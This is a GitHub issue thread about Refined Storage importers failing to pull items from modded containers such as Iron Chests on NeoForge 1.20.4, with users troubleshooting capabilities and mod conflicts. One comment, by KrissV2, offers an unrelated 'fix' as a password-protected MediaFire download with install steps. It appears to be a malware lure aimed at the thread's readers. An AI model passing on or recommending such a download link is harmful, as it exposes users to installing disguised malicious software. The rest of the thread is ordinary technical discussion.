### ISSUE TITLE
Refined Storage Importer not importing from non-vanilla storage

### ISSUE THREAD

**Issue by RyanMillerGames** [refinedmods/refinedstorage#3731]
### Describe the bug

When I connect an importer to other mod storage objects (such as any chest from Iron Chests, or a counter from Macaw's furniture), it will not pull items from it. However if I swap the storage container with a vanilla container such as a chest or barrel, it will immediately work.

I've checked the filters, they are on blacklist mode, with nothing blacklisted, I've tried it with a range of vanilla objects inside of the containers, such as saplings, dirt blocks, etc, and there's plenty of space in the computer, as well as infinite power (using a creative controller).

I created a single player world with only the mods "Iron Chests" and Refined Storage on it to isolate it, and it still occurred.

I have used importers before many times, so I know I am putting the importer "into" the container. In fact, I noticed this issue in the first place because I was updating my private server from 1.19.2 to 1.20.4 which had a functional importer into an obsidian chest from "Iron Chests" and I noticed it stopped working, even though I've used it dozens of times before this update.

I tried making the importer connection directly, as well as swapping out the working vanilla chest for a mod chest, and vice versa. The modded storage is always ignored.

### How can we reproduce this bug or crash?

1. Install any mod with other storage containers (Iron Chests as an example)
2. Create a functional computer system using Refined Storage that can pull from a vanilla chest
- Creative Controller (I also usually have my config set to not use power at all)
- 4k storage block (I've tried it with disk drives and other storage blocks, same issue)
- Grid (Also tried with a crafting grid)
3. Replace the vanilla chest with the modded storage container
4. Observe bug

### What Minecraft version is this happening on?

Minecraft 1.20.4

### What Forge version is this happening on?

NeoForge 20.4.237

### What Refined Storage version is this happening on?

1.13.0-beta.4

**Comment by Nodrance** [comment]
do exporters and external storages work?

**Comment by RyanMillerGames** [comment]
> do exporters and external storages work?

I just tried them now, similar to the importer issue, they work for vanilla objects, but do not function with modded containers.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Nodrance** [comment]
Do pipes from other mods (pipez, pretty pipes, mek logistical transporters) work on that same side of that block?

**Comment by Nodrance** [comment]
or hoppers, if the side happens to be the bottom

**Comment by RyanMillerGames** [comment]
Okay I tried a few more things:

- Hoppers do work on the other storage containers
- Pipez DO NOT work on the Iron Chests storage containers, nor the Macaws Furniture (I hadn't used Pipez before, so I had to learn how to use it, and I got them working on vanilla storage chests, but the exact same setup does not work for the two I mentioned)
- I tried using both Pipez and Refined Storage Importers on a Sophisticated Backpack when I remembered that it is also a storage container and *that does work!*.

I'm confused why Vanilla objects like Hoppers can recognize the Iron Chests and Macaws Furniture containers though, but not Pipez or Refined Storage. I don't know enough about how things work code side to be useful here.

What are your thoughts? I'm new to reporting these bugs, so I wasn't sure what to do next here.

**Comment by Nodrance** [comment]
It sounds like side config maybe? Is there any way to set which sides of the block allow pipes and hoppers?

Also, does the same thing happen on a brand new creative world?

**Comment by RyanMillerGames** [comment]
There's no side configs for Iron Chests or Macaws from what I can see. There's not even a config file for Iron Chests (or a tool within the mod). It's just like a vanilla chest with more storage.

Also, to be clear, the importer doesn't work on any side, I tried from the bottom as well. It just doesn't seem to recognize the Iron Chest as a container.

I just created a fresh creative world, built the computer setup repro I mentioned, and tried with an Iron Chest, same results, nothing being taken from it, but replace it with a Vanilla chest and it works right away.

**Comment by Nodrance** [comment]
extremely interesting. Which modpack is this? I can test it out on my own machine

(btw, now might be a good time to mention i don't work on the mod and can't actually fix anything, I just usually know what questions to ask to figure out what's wrong)

**Comment by Darkere** [comment]
This issue is not related to Refined Storage. Something in your modpack seems to be breaking capabilities which is a general forge feature.

**Comment by Nodrance** [comment]
If you join the discord i can still try to help you (but yeah they're kinda right this isn't rs)

**Comment by RyanMillerGames** [comment]
This is just a custom bunch of mods I use for a private server.

I do want to be clear, I tested this with *only* RS and Iron Chests, and the issue exists. I totally understand that it may not be RS' fault, and instead Iron Chest, but it's definitely something between those two specific mods.

Would y'all suggest I go to the Iron Chest mod to report the bug then?

**Comment by Nodrance** [comment]
If pipez doesn't work, and rs doesn't work, and ironchests doesn't work, and macaw's doesn't work, that's 4 mods. They can't all be responsible. What's most likely is that some other mod is interfering with all of them somehow

Having an inventory and taking items out of it is the exact same for every mod. That's something added directly by forge. It's the exact same code for a chest vs an iron chest vs a drawer vs some factory thingy, and the same code for hoppers and pipez and importers. If that one piece of code doesn't work, the issue isn't with RS or pipez, the issue is with whatever mod is changing how that code works. 

I hope this all makes sense, but the short answer is it's not RS, it's not ironchests, it's not macaws, and it's not pipez. If any of those mods were at fault, you would be seeing different symptoms than you are

**Comment by RyanMillerGames** [comment]
Those are fair points, though as I mentioned, this issue still occurs when I *only* have RS and Iron Chests installed, so it's not a mysterious *other* mod, cause I'm not using a mod pack. This is literally just my mod folder being emptied, and the two jars being put in.

However, there is one other variable at play, which is NeoForge 1.20.4 itself (version 20.4.237 specifically).

I used Forge in the past, not NeoForge, so I'm unfamiliar if there's a generic issue with NeoForge and modded containers?
